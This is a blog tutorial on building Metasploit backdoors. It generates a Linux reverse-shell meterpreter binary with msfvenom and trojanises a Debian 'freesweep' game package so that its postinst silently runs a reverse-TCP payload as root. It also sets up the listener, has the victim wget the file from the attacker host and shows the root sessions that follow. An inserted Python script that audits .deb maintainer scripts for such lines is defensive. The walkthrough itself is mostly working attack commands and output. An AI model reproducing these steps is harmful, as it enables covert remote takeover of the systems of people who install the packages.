Metasploit backdoor attack examples (5)

1.1 Backdoor attack examples

1.1.1 Building a Linux backdoor to obtain a shell

1.1.1.1 Build the Linux trojan

# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor

1.1.1.2 Start the listener on Kali

msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

1.1.1.3 Run the trojan on Linux (CentOS)

[root@test ~]# wget http://192.168.10.180/backdoor
[root@test ~]# chmod +x backdoor
[root@test ~]# nohup ./backdoor &

1.1.1.4 Run commands once the backdoor has connected back

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.10.80
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  13893  fil   2022-06-01 16:01:33 +0800  .bash_history
100644/rw-r--r--  18     fil   2013-12-29 10:26:31 +0800  .bash_logout
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bash_profile
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bashrc
100644/rw-r--r--  100    fil   2013-12-29 10:26:31 +0800  .cshrc
040755/rwxr-xr-x  37     dir   2021-12-14 10:44:29 +0800  .java
100600/rw-------  349    fil   2021-12-17 14:11:10 +0800  .mysql_history
040740/rwxr-----  19     dir   2021-11-16 10:41:42 +0800  .pki
040700/rwx------  25     dir   2021-12-14 13:23:17 +0800  .ssh
100644/rw-r--r--  129    fil   2013-12-29 10:26:31 +0800  .tcshrc
100600/rw-------  6982   fil   2022-05-12 10:36:28 +0800  .viminfo
100600/rw-------  1434   fil   2021-05-21 14:07:28 +0800  anaconda-ks.cfg
100755/rwxr-xr-x  295    fil   2022-06-07 17:05:55 +0800  backdoor
100644/rw-r--r--  27647  fil   2022-06-01 10:47:00 +0800  dnmap-0.6.zip
040755/rwxr-xr-x  199    dir   2022-06-01 15:02:43 +0800  dnmap-master
100644/rw-r--r--  23761  fil   2022-01-13 13:28:05 +0800  history.log

1.1.2 Injecting a backdoor into a deb package

1.1.2.1 Build the malicious deb package

  • Download and unpack the deb package
# apt install freesweep --download-only
# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ./
# dpkg -x freesweep_1.0.2-1_amd64.deb free
  • Generate the backdoor file
# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources
  • Create the control files for repackaging the deb
# mkdir -p /root/free/DEBIAN
# cd /root/free/DEBIAN

# cat >> /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where one
 tries to find all the mines without igniting any, based on hints given by
 the computer. Unlike most implementations of this game, Freesweep works in
 any visual text display - in Linux console, in an xterm, and in most
 text-based terminals currently in use.
EOF

# cat >> /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

# chmod 755 /root/free/DEBIAN/postinst
  • Repackage the deb file
# dpkg-deb --build /root/free/
# ll -h free.deb
-rw-r--r-- 1 root root 55K Jun  8 08:54 free.deb
# If this fails with: dpkg-deb: file `free.deb' contains ununderstood data member control.tar.xz , giving up
# then build the package with: dpkg-deb -Z gzip --build ./free free.deb
# mv free.deb /var/www/html
# systemctl start apache2.service
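A defender handed a .deb from an untrusted source can read its maintainer scripts before installing anything, because a .deb is only an ar archive holding debian-binary, control.tar.* and data.tar.*. The following is an added example, not code from the original post: it parses that archive in pure Python and flags the three things the postinst above does (a setgid chmod, sudo, and a backgrounded process); the pattern list and the minimal sample-package builder are constructed for this example.

```python
import io, re, tarfile
# Heuristic patterns for the maintainer scripts (constructed for this example, not a dpkg feature).
RISKY = {
    "setuid/setgid chmod": re.compile(r"chmod\s+[2467]\d{3}\b"),
    "background process": re.compile(r"&\s*$"),
    "sudo in maintainer script": re.compile(r"\bsudo\b"),
}
SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

def ar_members(data: bytes):
    """Yield (name, body) for each member of the ar archive that wraps a .deb."""
    if data[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(data):
        hdr = data[pos:pos + 60]                          # fixed 60-byte member header
        name = hdr[0:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode())
        yield name, data[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                     # bodies are padded to even length

def maintainer_scripts(deb: bytes) -> dict:
    """Return {script_name: text} from control.tar.* without installing anything."""
    found = {}
    for name, body in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(body), mode="r:*") as tar:
                for m in tar.getmembers():
                    if m.isfile() and m.name.split("/")[-1] in SCRIPTS:
                        found[m.name.split("/")[-1]] = tar.extractfile(m).read().decode(errors="replace")
    return found

def audit(deb: bytes) -> list:
    """Return (script, line_no, label, line) for every risky line in the maintainer scripts."""
    return [(script, n, label, line.strip())
            for script, text in maintainer_scripts(deb).items()
            for n, line in enumerate(text.splitlines(), 1)
            for label, pat in RISKY.items() if pat.search(line)]

def build_sample_deb(postinst: str) -> bytes:
    """Constructed minimal .deb (debian-binary + control.tar.gz, no data.tar) to exercise the audit."""
    tar_buf, body = io.BytesIO(), postinst.encode()
    with tarfile.open(fileobj=tar_buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("./postinst")
        info.size, info.mode = len(body), 0o755
        tar.addfile(info, io.BytesIO(body))
    def member(name, data):                               # one ar member: 60-byte header + padded body
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        return hdr + data + (b"\n" if len(data) % 2 else b"")
    return b"!<arch>\n" + member("debian-binary", b"2.0\n") + member("control.tar.gz", tar_buf.getvalue())
# The postinst from the walkthrough above, used as the sample input.
SAMPLE_POSTINST = "#!/bin/bash\nsudo chmod 2755 /usr/games/freesweep_sources\nsudo /usr/games/freesweep_sources &\n"
```

Run against a real package, `audit(open("free.deb", "rb").read())` lists every line worth a second look; a package whose postinst only calls the distribution's own helpers produces no findings.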

1.1.2.2 Start the msf listener

# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit -j

1.1.2.3 Install the deb on the client

msfadmin@metasploitable:~$ wget http://192.168.10.180/free.deb
msfadmin@metasploitable:~$ sudo dpkg -i free.deb

1.1.2.4 Check the connection and gather server information

msf6 exploit(multi/handler) > sessions


msf6 exploit(multi/handler) > sessions -i 5
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
background

Background session 5? [y/N]  y
Note: this article was last updated on 2022-12-20 20:57:32; some of its content may be out of date.
When reposting, please cite the original link: https://blog.leonshadow.cn/763482/2983.html